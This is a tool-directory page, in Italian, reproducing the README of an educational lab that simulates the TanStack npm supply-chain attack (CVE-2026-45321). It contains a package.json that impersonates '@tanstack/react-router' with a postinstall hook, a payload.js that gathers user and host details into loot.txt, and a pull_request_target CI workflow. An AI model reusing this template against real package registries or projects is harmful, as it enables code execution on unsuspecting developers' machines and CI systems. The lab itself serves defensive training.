Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-45321-Tanstack — Laboratorio educativo che simula attacchi alla supply chain npm, abuso di CI/CD ed esecuzione di codice in fase di installazione tramite CVE-2026-45321. Formazione pratica sulla sicurezza difensiva con distribuzione locale di pacchetti dannosi. | Kitploit
Strumenti/GitHubGitHub/7whyex/cve-2026-45321-tanstack
Analisi delle VulnerabilitàAnalisi MalwareSicurezza della Supply ChainApprendimento e FormazioneLab e Pratica
GitHub7whyex/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

Laboratorio educativo che simula attacchi alla supply chain npm, abuso di CI/CD ed esecuzione di codice in fase di installazione tramite CVE-2026-45321. Formazione pratica sulla sicurezza difensiva con distribuzione locale di pacchetti dannosi.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1 mese faNon ancora revisionato

Simulazione di Attacco alla Supply Chain — CVE-2026-45321 (TanStack)

Laboratorio didattico per comprendere gli attacchi alla supply chain npm, l'abuso di CI/CD e l'esecuzione di codice al momento dell'installazione

Disclaimer

Questo progetto è stato creato esclusivamente per:

  • apprendimento della sicurezza informatica,
  • ricerca sulla sicurezza difensiva,
  • simulazione in ambiente locale,
  • comprensione del concetto di attacco alla supply chain.

Non utilizzare questo progetto per:

  • attaccare sistemi reali,
  • rubare credenziali,
  • distribuzione di malware,
  • accesso non autorizzato,
  • o altre attività illegali.

Descrizione

Questo laboratorio simula i concetti fondamentali degli incidenti:

  • CVE-2026-45321
  • Compromissione della supply chain npm di TanStack
  • Abuso di GitHub Actions CI/CD
  • Esecuzione di script del ciclo di vita npm

La simulazione viene eseguita localmente e in sicurezza, senza:

  • furto reale di credenziali,
  • esfiltrazione di token,
  • o compromissione di servizi di terze parti.

Struttura del Laboratorio

root@kitploit:~
lab/
├── fake-repo/          # Simulazione del repository target
├── attacker-package/   # Simulazione del pacchetto malevolo
└── victim-project/     # Simulazione della vittima

Funzionamento della Simulazione

root@kitploit:~
Pacchetto dell'attaccante
        ↓
npm install
        ↓
esecuzione dello script postinstall
        ↓
payload.js viene eseguito automaticamente
        ↓
La vittima subisce l'esecuzione al momento dell'installazione

Concetti Appresi

  • hook del ciclo di vita npm
  • esecuzione arbitraria di codice al momento dell'installazione
  • attacco alla supply chain
  • confine di fiducia CI/CD
  • pacchetto npm malevolo
  • abuso di postinstall
  • compromissione delle dipendenze

Installazione

1. Clonare il Repository

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

Setup del Pacchetto dell'Attaccante

2. Entrare nella Cartella del Pacchetto dell'Attaccante

root@kitploit:~
cd attacker-package

3. Installare le Dipendenze

root@kitploit:~
npm install

4. Creare il Tarball del Pacchetto

root@kitploit:~
npm pack

Risultato:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

Simulazione della Vittima

5. Entrare nel Progetto Vittima

root@kitploit:~
cd ../victim-project

6. Installare il Pacchetto Malevolo

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

Output

Se ha successo, apparirà:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

e il file:

root@kitploit:~
loot.txt

verrà creato automaticamente.


Esempio di payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

Esempio di package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

Simulazione CI/CD

Questo progetto può essere utilizzato anche per comprendere:

  • GitHub Actions
  • pull_request_target
  • confine dei privilegi CI/CD
  • esecuzione delle dipendenze

Esempio di workflow:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

Relazione con CVE-2026-45321

Simulazione in LaboratorioMondo Reale
attacker-packagepacchetto TanStack compromesso
payload.jsinstaller malevolo

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

Solo a Scopo Didattico

Questo laboratorio è stato creato per aumentare la consapevolezza riguardo a:

  • sicurezza della supply chain,
  • sicurezza delle dipendenze,
  • sicurezza CI/CD,
  • e ricerca sulla sicurezza difensiva.
Scarica lo strumento
postinstallabuso dell'hook del ciclo di vita
victim-projectsviluppatore/CI vittima
fake-repopipeline GitHub Actions